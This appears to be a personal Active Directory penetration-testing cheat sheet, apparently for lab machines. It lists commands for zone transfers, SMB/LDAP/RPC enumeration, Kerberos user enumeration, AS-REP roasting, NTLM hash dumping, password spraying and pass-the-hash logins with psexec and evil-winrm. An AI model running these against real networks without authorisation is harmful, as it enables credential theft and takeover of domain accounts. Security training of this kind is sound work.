Active Directory Attacking Methodology

======================================================================

======================================================================

Website for help: https://wadcoms.github.io/

Detailed Information: https://navkang.github.io/Doozy/winprivesc2.html

-------------------------------------------------------------------------------------

Port 53 open: (zone transfer)

dig axfr @10.10.10.10 local.htb

dig axfr @ 10.10.10.10 local-bank.local

-------------------------------------------------------------------------------------

Ports 135,139 and 445 open: (shares, comp and domain info, users)

smbclient -L \\\\<ip>\\

smbclient \\\\IP address\sharename\

smbclient -U <username> \\\\ ip \sharename

-----------------------------------------------------------

smbmap -H <ip>

smbmap -u user -p pass -H <ipadd>

(also try with "" instead of user and pass)

-----------------------------------------------------------

rpcclient -U "" IPadd

          - enumdomusers

          - enumdomgroups

          - queryuser <RID>

----------------------------------------------------------

crackmapexec smb <ipadd> -u " -p "

-------------------------------------------------------------------------------------

Port 389 open: (domain and users information)

LDAPsearch:

-x = anonymous -b domainname -H= host

ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts (then when you have the domain)

ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'

-------------------------------------------------------------------------------------

Kerberos port 88 open: (spraying for valid usernames)

kerbrute userenum -d test.local <username list> --dc <ip add>

kerbrute userenum -d test.local <username list>

-------------------------------------------------------------------------------------

Others tools & purpose:

GetNPusers.py (look for vulnerable users - needs valid username list)

python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt

-----------------------------------------------------------

Secretsdump.py (dump hashes)

secretsdump.py -just-dc-ntlm <domain/username>@<ipadd>

----------------------------------------------------------

password spraying:

crackmapexec smb <ipadd> -u user.list -p password --continue-on-success

---------------------------------------------------------------------------------------------------------------------

Connecting tools:

PSEXEC:

impacket-psexec username:password@ipadd

impacket-psexec administrator@ipadd -hashes : <2nd part of hash>

------------------------------------------------------------

EVIL-WINRM:

evil-winrm -i <ip add> -u user -p pass

-----------------------------------------------------------

CRACKMAPEXEC:

crackmapexec smb 10.129.79.75 -u user -p pass

(there are other options so winrm can be used instead of smb)